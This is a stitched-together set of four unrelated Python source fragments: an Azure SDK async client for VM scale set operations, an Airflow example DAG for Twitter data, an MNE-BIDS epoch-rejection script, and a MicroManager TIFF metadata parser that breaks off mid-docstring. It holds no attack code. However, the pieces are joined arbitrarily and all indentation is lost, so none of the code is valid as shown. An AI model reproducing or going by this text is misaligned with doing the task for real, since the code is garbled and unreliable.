:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineScaleSetVMListResult or the result
of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
resource_group_name=resource_group_name,
virtual_machine_scale_set_name=virtual_machine_scale_set_name,
subscription_id=self._config.subscription_id,
filter=filter,
select=select,
expand=expand,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'} # type: ignore
async def _power_off_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_power_off_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._power_off_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
@distributed_trace_async
async def begin_power_off(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Power off (stop) a virtual machine in a VM scale set. Note that resources are still attached
and you are getting charged for the resources. Instead, use deallocate to release resources and
avoid charges.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._power_off_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'} # type: ignore
async def _restart_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_restart_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._restart_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
@distributed_trace_async
async def begin_restart(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Restarts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._restart_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'} # type: ignore
async def _start_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_start_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._start_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
@distributed_trace_async
async def begin_start(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Starts a virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'} # type: ignore
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# --------------------------------------------------------------------------------
# Written By: Ekhtiar Syed
# Last Update: 8th April 2016
# Caveat: This Dag will not run because of missing scripts.
# The purpose of this is to give you a sample of a real world example DAG!
# --------------------------------------------------------------------------------
# --------------------------------------------------------------------------------
# Load The Dependencies
# --------------------------------------------------------------------------------
"""
This is an example dag for managing twitter data.
"""
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
# --------------------------------------------------------------------------------
# Create a few placeholder scripts. In practice these would be different python
# script files, which are imported in this section with absolute or relative imports
# --------------------------------------------------------------------------------
def fetchtweets():
"""
This is a placeholder for fetchtweets.
"""
def cleantweets():
"""
This is a placeholder for cleantweets.
"""
def analyzetweets():
"""
This is a placeholder for analyzetweets.
"""
def transfertodb():
"""
This is a placeholder for transfertodb.
"""
# --------------------------------------------------------------------------------
# set default arguments
# --------------------------------------------------------------------------------
default_args = {
'owner': 'Ekhtiar',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(5),
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
}
with DAG(
dag_id='example_twitter_dag',
default_args=default_args,
schedule_interval="@daily"
) as dag:
# --------------------------------------------------------------------------------
# This task should call Twitter API and retrieve tweets from yesterday from and to
# for the four twitter users (Twitter_A,..,Twitter_D) There should be eight csv
# output files generated by this task and naming convention
# is direction(from or to)_twitterHandle_date.csv
# --------------------------------------------------------------------------------
fetch_tweets = PythonOperator(
task_id='fetch_tweets',
python_callable=fetchtweets
)
# --------------------------------------------------------------------------------
# Clean the eight files. In this step you can get rid of or cherry pick columns
# and different parts of the text
# --------------------------------------------------------------------------------
clean_tweets = PythonOperator(
task_id='clean_tweets',
python_callable=cleantweets
)
clean_tweets << fetch_tweets
# --------------------------------------------------------------------------------
# In this section you can use a script to analyze the twitter data. Could simply
# be a sentiment analysis through algorithms like bag of words or something more
# complicated. You can also take a look at Web Services to do such tasks
# --------------------------------------------------------------------------------
analyze_tweets = PythonOperator(
task_id='analyze_tweets',
python_callable=analyzetweets
)
analyze_tweets << clean_tweets
# --------------------------------------------------------------------------------
# Although this is the last task, we need to declare it before the next tasks as we
# will use set_downstream This task will extract summary from Hive data and store
# it to MySQL
# --------------------------------------------------------------------------------
hive_to_mysql = PythonOperator(
task_id='hive_to_mysql',
python_callable=transfertodb
)
# --------------------------------------------------------------------------------
# The following tasks are generated using for loop. The first task puts the eight
# csv files to HDFS. The second task loads these files from HDFS to respected Hive
# tables. These two for loops could be combined into one loop. However, in most cases,
# you will be running different analysis on your incoming incoming and outgoing tweets,
# and hence they are kept separated in this example.
# --------------------------------------------------------------------------------
from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
yesterday = date.today() - timedelta(days=1)
dt = yesterday.strftime("%Y-%m-%d")
# define where you want to store the tweets csv file in your local directory
local_dir = "/tmp/"
# define the location where you want to store in HDFS
hdfs_dir = " /tmp/"
for channel in to_channels:
file_name = "to_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
for channel in from_channels:
file_name = "from_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
|
"""
========================================================
06. Remove epochs based on peak-to-peak (PTP) amplitudes
========================================================
Epochs containing peak-to-peak above the thresholds defined
in the 'reject' parameter are removed from the data.
This step will drop epochs containing non-biological artifacts
but also epochs containing biological artifacts not sufficiently
corrected by the ICA or the SSP processing.
"""
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=cfg.task,
acquisition=cfg.acq,
run=None,
recording=cfg.rec,
space=cfg.space,
suffix='epo',
extension='.fif',
datatype=cfg.datatype,
root=cfg.deriv_root,
check=False)
infile_processing = cfg.spatial_filter
fname_in = bids_path.copy().update(processing=infile_processing)
fname_out = bids_path.copy().update(processing='clean')
msg = f'Input: {fname_in}, Output: {fname_out}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
# Get rejection parameters and drop bad epochs
epochs = mne.read_epochs(fname_in, preload=True)
reject = config.get_reject(epochs=epochs)
if cfg.ica_reject is not None:
for ch_type, threshold in cfg.ica_reject.items():
if (ch_type in reject and
threshold < reject[ch_type]):
# This can only ever happen in case of
# reject = 'autoreject_global'
msg = (f'Adjusting PTP rejection threshold proposed by '
f'autoreject, as it is greater than ica_reject: '
f'{ch_type}: {reject[ch_type]} -> {threshold}')
logger.info(**gen_log_kwargs(message=msg,
subject=subject, session=session))
reject[ch_type] = threshold
msg = f'Using PTP rejection thresholds: {reject}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
n_epochs_before_reject = len(epochs)
epochs.reject_tmin = cfg.reject_tmin
epochs.reject_tmax = cfg.reject_tmax
epochs.drop_bad(reject=reject)
n_epochs_after_reject = len(epochs)
if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
msg = ('More than 50% of all epochs rejected. Please check the '
'rejection thresholds.')
logger.warning(**gen_log_kwargs(message=msg, subject=subject,
session=session))
elif n_epochs_after_reject == 0:
raise RuntimeError('No epochs remaining after peak-to-peak-based '
'rejection. Cannot continue.')
msg = 'Saving cleaned, baseline-corrected epochs …'
epochs.apply_baseline(cfg.baseline)
epochs.save(fname_out, overwrite=True)
def get_config(
subject: Optional[str] = None,
session: Optional[str] = None
) -> BunchConst:
cfg = BunchConst(
task=config.get_task(),
datatype=config.get_datatype(),
acq=config.acq,
rec=config.rec,
space=config.space,
baseline=config.baseline,
reject_tmin=config.reject_tmin,
reject_tmax=config.reject_tmax,
spatial_filter=config.spatial_filter,
ica_reject=config.get_ica_reject(),
deriv_root=config.get_deriv_root(),
decim=config.decim
)
return cfg
def main():
"""Run epochs."""
parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
logs = parallel(
run_func(cfg=get_config(), subject=subject, session=session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions())
)
config.save_logs(logs)
if __name__ == '__main__':
main()
|
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class MicroManagerTIFF:
def __init__(self, src_filepath, verbose=True):
'''
'''
self.verbose = verbose
self.src_filepath = src_filepath
self.events = []
self.global_metadata = {'processing_timestamp': timestamp()}
self.open_tiff()
def event_logger(self, message):
'''
'''
if self.verbose:
print('EVENT: %s' % message)
self.events.append({'message': message, 'timestamp': timestamp()})
def save_events(self, dst_filepath):
if not self.events:
return
pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)
def save_global_metadata(self, dst_filepath):
with open(dst_filepath, 'w') as file:
json.dump(self.global_metadata, file)
def save_mm_metadata(self, dst_filepath):
self.mm_metadata.to_csv(dst_filepath, index=False)
def calc_hash(self):
'''
Calculate the sha1 hash from the file contents
'''
sha1 = hashlib.sha1()
with open(self.src_filepath, 'rb') as file:
sha1.update(file.read())
hash_value = sha1.hexdigest()
self.global_metadata['sha1_hash'] = hash_value
return hash_value
def open_tiff(self):
'''
Open the stack using tifffile.TiffFile
'''
self.tiff = tifffile.TiffFile(self.src_filepath)
@staticmethod
def _parse_mm_tag_schema_v1(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'old' schema
(KC: I believe this schema corresponds to MicroManager 1.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag['AndorEMCCD-Exposure'],
'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
}
return metadata
@staticmethod
def _parse_mm_tag_schema_v2(mm_tag):
'''
Parse a MicroManagerMetadata tag in the 'new' schema
(KC: I believe this schema corresponds to MicroManager 2.x)
'''
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
}
return metadata
def parse_micromanager_metadata(self):
'''
Parse the MicroManager metadata for each page in the TIFF file
'''
# the IJMetadata appears only in the first page
ij_metadata = None
try:
ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
except Exception:
self.event_logger('There was no IJMetadata tag found on the first page')
if ij_metadata is not None:
try:
ij_metadata = json.loads(ij_metadata)
except Exception:
self.event_logger('IJMetadata could not be parsed by json.loads')
mm_metadata_rows = []
for ind, page in enumerate(self.tiff.pages):
mm_metadata_row = {
'page_ind': ind,
'error': False
}
mm_tag = page.tags.get('MicroManagerMetadata')
if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
mm_metadata_row['error'] = True
mm_metadata_rows.append(mm_metadata_row)
continue
try:
page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
except Exception:
page_metadata_v1 = None
try:
page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
except Exception:
page_metadata_v2 = None
page_metadata = {}
mm_metadata_version = None
if page_metadata_v1 is not None:
mm_metadata_version = 'v1'
page_metadata = page_metadata_v1
elif page_metadata_v2 is not None:
mm_metadata_version = 'v2'
page_metadata = page_metadata_v2
else:
mm_metadata_row['error'] = True
self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)
mm_metadata_rows.append({**mm_metadata_row, **page_metadata})
self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# the channels we expect to find in a Pipeline-like TIFF
self.laser_405 = '405'
self.laser_488 = '488'
def validate_micromanager_metadata(self):
'''
Validate the parsed MicroManager metadata tags for a raw Pipeline-like TIFF file
(these are TIFFs found in the 'PlateMicroscopy' directory)
Generates validated_mm_metadata and sets various flags
that determine whether and how to split the pages into the 405 and 488 channels
Steps
------
- drop rows with any NAs
- check that the dropped rows had a parsing error
- check for two channel_inds and an equal number of pages from each
- if there are no channel_inds, check for an even number of pages
- if there are two channel_inds, check that slice_inds
and exposure settings are consistent within each channel
'''
# whether the MM metadata has two channel inds with an equal number of slices
self.has_valid_channel_inds = False
# whether the MM metadata for each channel has slice_inds that increment by one
self.has_valid_slice_inds = False
# whether it is safe to split the TIFF stack into channels by splitting the pages in half,
# when there are not valid channel inds
self.safe_to_split_in_half = False
md = self.mm_metadata.copy()
# remove the error flag column
errors = md['error']
md = md.drop(labels='error', axis=1)
# drop rows with NAs in any of the columns parsed from the MicroManagerMetadata tag
parsed_columns = set(md.columns).difference(['page_ind'])
md = md.dropna(how='any', subset=parsed_columns, axis=0)
# check that the dropped rows had an error
# (note that 'error' means either there was no MM tag or it could not be parsed)
num_error_rows = errors.sum()
num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
if num_dropped_rows != num_error_rows:
self.event_logger(
'%s rows with NAs were dropped but %s rows had errors'
% (num_dropped_rows, num_error_rows)
)
# check that we can coerce the parsed columns as expected
int_columns = ['slice_ind', 'channel_ind']
for column in int_columns:
md[column] = md[column].apply(int)
float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
for column in float_columns:
md[column] = md[column].apply(float)
# if there are two distinct channels, we assign the first to 405 and the second to 488
self.channel_inds = None
unique_channel_inds = sorted(md.channel_ind.unique())
if len(unique_channel_inds) == 2:
self.channel_inds = {
self.laser_405: min(unique_channel_inds),
self.laser_488: max(unique_channel_inds),
}
# if there are three channel_inds, we assume the third channel is brightfield
elif set(unique_channel_inds) == set([0, 1, 2]):
self.event_logger('There were three channel inds')
self.channel_inds = {
self.laser_405: 0,
self.laser_488: 1,
}
# if there's one channel index, check for an even number of pages
elif len(unique_channel_inds) == 1:
if np.mod(md.shape[0], 2) == 0:
self.safe_to_split_in_half = True
else:
self.event_logger('There is one channel_ind and an odd number of pages')
else:
self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)
# if there were valid channel_inds, check for an equal number of pages from each channel
if self.channel_inds is not None:
num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
if num_405 == num_488:
self.has_valid_channel_inds = True
else:
self.event_logger(
'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
)
# in each channel, check that slice_ind increments by 1.0
# and that exposure time and laser power are consistent
for channel_ind in unique_channel_inds:
md_channel = md.loc[md.channel_ind == channel_ind]
steps = np.unique(np.diff(md_channel.slice_ind))
# check that slice inds are contiguous
if len(steps) == 1 and steps[0] == 1:
self.has_valid_slice_inds = True
elif len(steps) == 1:
self.event_logger(
'Unexpected slice_ind increment %s for channel_ind %s'
% (steps[0], channel_ind)
)
elif len(steps) > 1:
self.event_logger(
'The slice_inds are not contiguous for channel_ind %s' % channel_ind
)
for column in float_columns:
steps = np.unique(np.diff(md_channel[column]))
if len(steps) > 1 or steps[0] != 0:
self.event_logger(
'Inconsistent values found in column %s for channel_ind %s'
% (column, channel_ind)
)
self.validated_mm_metadata = md
@staticmethod
def tag_and_coerce_metadata(row, tag):
'''
Transform `row` to a dict, prepend the keys with `tag`,
and do some hackish type coercion
'''
d = {}
for key, val in dict(row).items():
key = '%s_%s' % (key, tag)
try:
val = float(val)
except Exception:
pass
d[key] = val
return d
def split_channels(self):
'''
Split the pages of the pipeline-like TIFF into 405 and 488 channels
to construct the z-stack for each channel and, if possible,
extract the channel-specific MM metadata (i.e., exposure time and laser power)
Overview
--------
In a perfect world, this would be easy: we would simple use the two unique channel_inds
to split the pages by channel (and verify the page order using the slice_inds).
Unfortunately, due to a bug, the MM metadata tag in some TIFFs is the same on every page
(this is notably true for 'disentangled' TIFFs from Plates 16,17,18).
In these cases, we split the tiff into channels simply by splitting the pages in half.
Note that we use the flags set in self.validate_mm_metadata to determine
which of these methods to use.
Assignment of channels
----------------------
When there are two valid channel_inds, the 405 laser is assigned
to the lower channel_ind (which is either 0 or -1).
When there are no channel_inds, the 405 laser is assigned
to the first half of the pages.
'''
